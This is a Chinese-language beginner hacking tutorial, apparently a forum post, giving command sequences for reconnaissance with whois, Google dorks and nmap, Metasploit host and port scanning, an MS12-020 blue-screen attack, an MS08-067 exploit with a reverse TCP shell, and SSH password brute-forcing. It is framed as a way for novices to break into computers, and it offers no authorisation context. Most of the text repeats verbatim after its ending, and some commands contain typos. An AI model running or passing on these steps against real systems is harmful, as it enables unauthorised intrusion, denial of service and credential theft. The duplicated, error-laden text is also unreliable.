下面是最近的一次簡單的滲透攻擊具體思路,涉及到2個系統服務攻擊,記住一步一步的看,雖然很多人都像我一樣對直接入侵電腦感興趣,但是他的前期是枯燥無味,不過一定要一步一步的看完,因爲通往權限的路,很艱難。MS12這個漏洞呢你可以通過msfconsole來進
行滲透,我就說折磨多了,你們自己看吧,雖然不是教程不過很詳細,很容易懂。QQ:1099718640不懂得來問我
此教程僅爲菜鳥,小白,入門提供,大鳥請飛走。
。。。。。。
攻擊前期 信息收集
攻擊中 利用漏洞
攻擊後 後滲透攻擊
網絡踩點 ip踩點
whois域名註冊信息查詢
whois 域名 testfire.net
nslookup與dig域名查詢
查詢服務器上的cache非權威
終端輸入nslookup
進入後set type=A
域名輸入
exit退出
dig查詢 可以指定具體的服務器查詢
dig ip 域名
IP2location地理位置查詢
www.maxmind.com 國外
www.cz88.net 國內
www.cnwzml.com 國內
netcraft實現信息查詢服務
searchdns.netcraft.com
www.cnwzml.com
ip2Domain反查域名
www.7c.com
www.cnwzml.com
ip-address.com
網絡踩點 搜索引擎
谷歌語法
parent directory site:域名
sete:域名 filetype:xls xls爲格式
搜索email地址
msf use auxiliary/gather/search_email_collector
擴普路徑踩點
traceroute 域名
tcptraceroute 域名
主機掃描 找出活躍主機
ping ip 太簡單
ping -c 表示數量
ping -s 表述數據包大小
arping 別躲了 ,必有
arping ip
在arp的基礎上加入網段掃描
arp-scan --interface=eth2 這是網卡 ip/24
nbtscan 掃描
nbtscan ip/24
nmap 最強工具,不解釋
nmap ip
nmap -sn ip/24 加sn不做端口
nmap ip/24
nmap -sS -Pn ip 能掃描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加 詳細
nmap -sV ip 能掃描到ip,端口,信息,操作
nmap -A ip 所有信息
msfconsole掃描主機
msfconsole進入
msf use auxiliary/scanner/discovery/arp_sweep 調用主機掃描模塊
msf auxiliary(arp_sweep)>show options
msf set options
msf set RHOSTS ip
msf set SMAC 那個網段
msf set INTERFADE eth2
ip-ip
msf set THREADs 10 線程
msf run 執行
系統掃描
xprobe2 ip
nmap -O ip
端口掃描
metaspolit端口掃描
塊不容易被發現
msf use auxiliary/scanner/portscan/syn 端口掃描模塊
msf set RHOSTS ip
msf set THREADS 20 線程數
run執行
back 退出
Nmap 端口服務系統探測
nmap -sS -Pn ip 能掃描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加 詳細
nmap -sV ip 能掃描到ip,端口,信息,操作
nmap -A ip 所有信息
漏洞掃描附帶滲透攻擊全程
MS12-020系統高危漏洞
一般開啓3389端口的xp和server 2003都有
DOS開啓windows server 2003
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
藍屏
MS08-067系統高危漏洞的滲透
msf search ms08_067
msf use exploit/windows/smb/ms08_067_netapi 調用ms08滲透攻擊模塊
msf show payloads 查看載荷
msf set payloads generic/shell_reverse_tcp
msf RHOST ip 設置目標ip
msf set LHOST ip 設置本地ip
msf set LPORT 5000本地端口
msf set target 5 設置目標系統操作代碼爲5,這裏指windows server 2003
msf show options 再次檢查滲透攻擊參數
msf exploit 執行滲透
拿到shell 成功滲透
後面是後滲透攻擊小部分
Telnet網絡查點
用戶賬戶名:口令猜測破解
錯誤配置的共享資源 惡意程序上傳
老舊版本的網絡服務版本 緩衝區於出漏洞攻擊
nmap -sV ip
msf use auxiliary/scanner/telnet/telnet_version 調用模塊
msf set RHOSTS ip/24
msf set THREADS 100 設置線程
msf run
telnet ip
SSH口令破解
msf use auxiliary/scanner/ssh/ssh_login 調用模塊
msf set RHOSTS ip
msf set USERNAME root 賬戶
msf set PASS_FILE/root/wonds.txt 設置目錄
msf set THPEADS 50 設置線程
msf run
Nessus
就是折磨簡單,不過這只是滲透的一部分,由於本人技術原因,也就只能寫到這了,後滲透攻擊,和一些其他的滲透系統攻擊之類的本人還並不會,
行滲透,我就說折磨多了,你們自己看吧,雖然不是教程不過很詳細,很容易懂。QQ:1099718640不懂得來問我
此教程僅爲菜鳥,小白,入門提供,大鳥請飛走。
。。。。。。
攻擊前期 信息收集
攻擊中 利用漏洞
攻擊後 後滲透攻擊
網絡踩點 ip踩點
whois域名註冊信息查詢
whois 域名 testfire.net
nslookup與dig域名查詢
查詢服務器上的cache非權威
終端輸入nslookup
進入後set type=A
域名輸入
exit退出
dig查詢 可以指定具體的服務器查詢
dig ip 域名
IP2location地理位置查詢
www.maxmind.com 國外
www.cz88.net 國內
www.cnwzml.com 國內
netcraft實現信息查詢服務
searchdns.netcraft.com
www.cnwzml.com
ip2Domain反查域名
www.7c.com
www.cnwzml.com
ip-address.com
網絡踩點 搜索引擎
谷歌語法
parent directory site:域名
sete:域名 filetype:xls xls爲格式
搜索email地址
msf use auxiliary/gather/search_email_collector
擴普路徑踩點
traceroute 域名
tcptraceroute 域名
主機掃描 找出活躍主機
ping ip 太簡單
ping -c 表示數量
ping -s 表述數據包大小
arping 別躲了 ,必有
arping ip
在arp的基礎上加入網段掃描
arp-scan --interface=eth2 這是網卡 ip/24
nbtscan 掃描
nbtscan ip/24
nmap 最強工具,不解釋
nmap ip
nmap -sn ip/24 加sn不做端口
nmap ip/24
nmap -sS -Pn ip 能掃描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加 詳細
nmap -sV ip 能掃描到ip,端口,信息,操作
nmap -A ip 所有信息
msfconsole掃描主機
msfconsole進入
msf use auxiliary/scanner/discovery/arp_sweep 調用主機掃描模塊
msf auxiliary(arp_sweep)>show options
msf set options
msf set RHOSTS ip
msf set SMAC 那個網段
msf set INTERFADE eth2
ip-ip
msf set THREADs 10 線程
msf run 執行
系統掃描
xprobe2 ip
nmap -O ip
端口掃描
metaspolit端口掃描
塊不容易被發現
msf use auxiliary/scanner/portscan/syn 端口掃描模塊
msf set RHOSTS ip
msf set THREADS 20 線程數
run執行
back 退出
Nmap 端口服務系統探測
nmap -sS -Pn ip 能掃描到ip,端口,信息,操作
nmap -sV -Pn ip 比上面更加 詳細
nmap -sV ip 能掃描到ip,端口,信息,操作
nmap -A ip 所有信息
漏洞掃描附帶滲透攻擊全程
MS12-020系統高危漏洞
一般開啓3389端口的xp和server 2003都有
DOS開啓windows server 2003
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
藍屏
MS08-067系統高危漏洞的滲透
msf search ms08_067
msf use exploit/windows/smb/ms08_067_netapi 調用ms08滲透攻擊模塊
msf show payloads 查看載荷
msf set payloads generic/shell_reverse_tcp
msf RHOST ip 設置目標ip
msf set LHOST ip 設置本地ip
msf set LPORT 5000本地端口
msf set target 5 設置目標系統操作代碼爲5,這裏指windows server 2003
msf show options 再次檢查滲透攻擊參數
msf exploit 執行滲透
拿到shell 成功滲透
後面是後滲透攻擊小部分
Telnet網絡查點
用戶賬戶名:口令猜測破解
錯誤配置的共享資源 惡意程序上傳
老舊版本的網絡服務版本 緩衝區於出漏洞攻擊
nmap -sV ip
msf use auxiliary/scanner/telnet/telnet_version 調用模塊
msf set RHOSTS ip/24
msf set THREADS 100 設置線程
msf run
telnet ip
SSH口令破解
msf use auxiliary/scanner/ssh/ssh_login 調用模塊
msf set RHOSTS ip
msf set USERNAME root 賬戶
msf set PASS_FILE/root/wonds.txt 設置目錄
msf set THPEADS 50 設置線程
msf run
Nessus
就是折磨簡單,不過這只是滲透的一部分,由於本人技術原因,也就只能寫到這了,後滲透攻擊,和一些其他的滲透系統攻擊之類的本人還並不會,